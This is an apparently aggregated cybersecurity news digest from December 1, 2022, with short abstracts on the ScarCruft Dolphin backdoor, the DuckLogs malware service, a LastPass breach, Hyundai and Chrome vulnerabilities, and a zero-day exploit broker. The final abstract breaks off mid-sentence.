The Evolution of Business Email Compromise Full Text
Abstract
While the threat has evolved, threat actors continue to use phishing attacks to steal credentials and then send fraudulent invoices soliciting payment. Thousands of organizations have lost billions of dollars.Dark Reading
December 1, 2022 – APT
North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea Full Text
Abstract
North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North...Security Affairs
December 01, 2022 – Malware
New DuckLogs malware service claims having thousands of ‘customers’ Full Text
Abstract
A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log key strokes, access clipboard data, and remote access to the compromised host.BleepingComputer
December 1, 2022 – Vulnerabilities
Exchange Server bugs caused years of security turmoil Full Text
Abstract
Nearly two years after the first series of Microsoft Exchange Server vulnerabilities became known, four collections of high-profile bugs are likely to remain a headache for enterprises for the foreseeable future.Tech Target
December 1, 2022 – Breach
Lastpass discloses the second security breach this year Full Text
Abstract
LastPass disclosed a new security breach, threat actors had access to its cloud storage using information stolen in the August 2022 breach. Password management solution LastPass disclosed a new security breach, the attackers had access to a third-party...Security Affairs
December 01, 2022 – Vulnerabilities
Hyundai app bugs allowed hackers to remotely unlock, start cars Full Text
Abstract
Vulnerabilities in mobile apps exposed Hyundai and Genesis car models after 2012 to remote attacks that allowed unlocking and even starting the vehicles.BleepingComputer
December 1, 2022 – Vulnerabilities
Chrome 108 Patches High-Severity Memory Safety Bugs Full Text
Abstract
Google this week announced the release of Chrome 108 in the stable channel with patches for 28 vulnerabilities, including 22 reported by external researchers. Of those 22, eight are high-severity issues and 14 are medium-severity flaws.Security Week
December 1, 2022 – Criminals
New Exploit Broker on the Scene Pays Premium for Signal App Zero-Days Full Text
Abstract
Russia-based OpZero went on the record recently with a $1.5 million offer for Signal remote code execution (RCE) exploits, more than tripling the relatively stable high-water mark for that app offered by American firm Zerodium.Dark Reading
December 1, 2022 – Malware
ScarCruft’s New Dolphin Backdoor Uses Google Drive for C&C Communication Full Text
Abstract
The backdoor has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.ESET Security
December 1, 2022 – General
Security pros feel threat detection and response workloads have increased Full Text
Abstract
A new report conducted by Enterprise Strategy Group (ESG) highlights why today’s security teams find it increasingly difficult to detect and stop cyber threats targeting their organizations.Help Net Security
December 01, 2022 – Hacker
North Korea Hackers Using New “Dolphin” Backdoor to Spy on South Korean Targets Full Text
Abstract
The North Korea-linked ScarCruft group has been attributed to a previously undocumented backdoor called Dolphin that the threat actor has used against targets located in its southern counterpart. "The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers," ESET researcher Filip Jurčacko said in a new report published today. Dolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control. The Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper. The campaign, first uncovered by Kaspersky and Volexity last year, entailed the weaponization of two Internet Explorer flaws ( CVE-2020-1380The Hacker News